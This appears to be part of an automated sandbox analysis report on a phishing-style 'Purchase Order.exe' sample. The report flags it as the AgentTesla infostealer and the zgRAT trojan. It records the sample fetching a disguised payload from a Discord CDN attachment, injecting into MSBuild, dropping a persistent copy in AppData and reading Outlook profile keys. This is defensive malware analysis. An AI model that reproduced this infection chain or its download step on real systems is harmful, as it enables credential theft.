                    Source: Purchase Order.exe, 00000000.00000002.371780538.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.508311794.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.508643864.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Purchase Order.exe, 00000000.00000002.371780538.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.508311794.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.508643864.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Purchase Order.exe, 00000000.00000002.371780538.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.508311794.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.508643864.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                    Source: MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                    Source: MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                    Source: MSBuild.exe, 00000011.00000003.397864043.000000000647A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                    Source: MSBuild.exe, 00000011.00000003.397864043.000000000647A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                    Source: MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                    Source: MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/968108194327052308/970585558680223784/Nqdkg_Cbadgewx.png HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49760 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49775 version: TLS 1.2
                    Source: Purchase Order.exe, 00000000.00000002.371300028.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 0.2.Purchase Order.exe.3adcb08.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase Order.exe.3a8cae8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase Order.exe.3a64ac8.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase Order.exe.3a8cae8.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Purchase Order.exe.3adcb08.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.3.Purchase Order.exe.3ccafd0.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.3.Purchase Order.exe.3ccafd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.3.Purchase Order.exe.3a99990.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 20.2.Puizg.exe.4319990.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.Puizg.exe.3769990.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.Puizg.exe.3769990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.Puizg.exe.36e9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 20.2.Puizg.exe.4319990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 20.2.Puizg.exe.4299970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.3.Purchase Order.exe.3a99990.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 20.2.Puizg.exe.4259950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 23.2.Puizg.exe.36a9950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.3.Purchase Order.exe.3a19970.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: Purchase Order.exe
                    Source: 17.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b37095B3Cu002dAC8Fu002d4F34u002d92E4u002dF9E61206C529u007d/u00392E28B4Bu002d4E3Eu002d4417u002dA852u002dA3F58E93A3A4.csLarge array initialization: .cctor: array initializer size 11626
                    Source: Purchase Order.exeStatic file information: Suspicious name
                    Source: Purchase Order.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: Purchase Order.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 20.2.Puizg.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.2.Purchase Order.exe.740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.0.Purchase Order.exe.740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 23.0.Puizg.exe.280000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 20.0.Puizg.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.2.Purchase Order.exe.3adcb08.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase Order.exe.3a8cae8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase Order.exe.3a64ac8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase Order.exe.3a8cae8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Purchase Order.exe.3adcb08.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 23.2.Puizg.exe.280000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: 0.3.Purchase Order.exe.3ccafd0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.3.Purchase Order.exe.3ccafd0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.3.Purchase Order.exe.3a99990.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 20.2.Puizg.exe.4319990.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.Puizg.exe.3769990.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.Puizg.exe.3769990.2.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 23.2.Puizg.exe.3769990.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.Puizg.exe.36e9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 23.2.Puizg.exe.36e9970.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 20.2.Puizg.exe.4319990.2.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 20.2.Puizg.exe.4319990.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 20.2.Puizg.exe.4299970.1.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 20.2.Puizg.exe.4299970.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.3.Purchase Order.exe.3a99990.2.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 0.3.Purchase Order.exe.3a99990.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 20.2.Puizg.exe.4259950.3.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 20.2.Puizg.exe.4259950.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 23.2.Puizg.exe.36a9950.3.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 23.2.Puizg.exe.36a9950.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.3.Purchase Order.exe.3a19970.0.raw.unpack, type: UNPACKEDPEMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
                    Source: 0.3.Purchase Order.exe.3a19970.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0074210A
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0126C164
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0126E5A0
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0126E5B0
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_080DE228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02F3F3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02F3F080
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_02F36120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0656B750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06566173
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06565870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06563330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0656CFF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0656CFA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06569DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06898508
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06896550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0689F368
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_068970F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06899FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0689BC10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06892AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06892B58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06891878
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_068983B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0689BBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06944280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_069416C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06948220
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 20_2_00FA210A
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 20_2_0308C164
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 20_2_0308E5A0
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 20_2_0308E5B0
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 23_2_0028210A
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 23_2_06763750
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 23_2_0676C8B8
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeCode function: 23_2_0676C8A8
                    Source: Purchase Order.exe, 00000000.00000002.371899368.0000000002B15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHVMyeBHFDdIOlKMOqpBtYESXmYzDcD.exe4 vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000003.366740996.00000000039E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXlwiuzuhblbjndopficwsye.dll" vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000002.371300028.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000000.237791318.0000000000746000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNqdkg.exe0 vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHVMyeBHFDdIOlKMOqpBtYESXmYzDcD.exe4 vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHVMyeBHFDdIOlKMOqpBtYESXmYzDcD.exe4 vs Purchase Order.exe
                    Source: Purchase Order.exe, 00000000.00000003.306760111.0000000003EEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXlwiuzuhblbjndopficwsye.dll" vs Purchase Order.exe
                    Source: Purchase Order.exeBinary or memory string: OriginalFilenameNqdkg.exe0 vs Purchase Order.exe
                    Source: Purchase Order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Puizg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order.exeJump to behavior
                    Source: Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe "C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\OarkzlbJump to behavior
                    Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@22/5@5/4
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
                    Source: 17.2.MSBuild.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 17.2.MSBuild.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Purchase Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: Purchase Order.exe, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
